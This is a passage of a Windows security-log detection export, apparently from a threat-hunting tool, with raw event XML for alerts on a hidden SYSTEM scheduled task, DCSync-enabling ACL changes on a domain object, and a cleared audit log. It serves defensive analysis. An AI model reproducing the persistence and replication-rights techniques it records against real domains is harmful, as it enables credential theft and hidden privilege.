131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,scheduled task \LMST updated by user ( a-jbrown ); the task is hidden and executes cmd.exe as SYSTEM with RunLevel HighestAvailable - review the action and author,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-02T11:47:48.959767Z"">
</TimeCreated>
<EventRecordID>2171293</EventRecordID>
<Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
</Correlation>
<Execution ProcessID=""632"" ThreadID=""4244"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
<Data Name=""SubjectUserName"">a-jbrown</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x21a8c68</Data>
<Data Name=""TaskName"">\LMST</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Date&gt;2020-09-02T04:47:49.74-07:00&lt;/Date&gt;
&lt;Author&gt;a-jbrown&lt;/Author&gt;
&lt;Description&gt;00304d6e&lt;/Description&gt;
&lt;URI&gt;\LMST&lt;/URI&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;TimeTrigger&gt;
&lt;StartBoundary&gt;2020-02-09T04:47:48&lt;/StartBoundary&gt;
&lt;EndBoundary&gt;2020-02-09T04:47:58&lt;/EndBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;/TimeTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;Author&quot;&gt;
&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;UserId&gt;SYSTEM&lt;/UserId&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;Duration&gt;PT10M&lt;/Duration&gt;
&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;Author&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/c echo testing &amp;gt; c:\users\public\out.txt&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User ( bob ) modified the nTSecurityDescriptor of the domain object; the written ACL contains DS-Replication-Get-Changes/-All ACEs (1131f6aa/1131f6ad) which enable DCSync - verify which SIDs hold these rights and correlate with 4662 replication events from non-DC accounts,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242597</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User ( bob ) modified the nTSecurityDescriptor of the domain object; the written ACL contains DS-Replication-Get-Changes/-All ACEs (1131f6aa/1131f6ad) which enable DCSync - verify which SIDs hold these rights and correlate with 4662 replication events from non-DC accounts,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242596</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2021-12-12T17:57:17.006377Z"">
</TimeCreated>
<EventRecordID>2982081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""472"" ThreadID=""4956"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x364f7</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242595</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699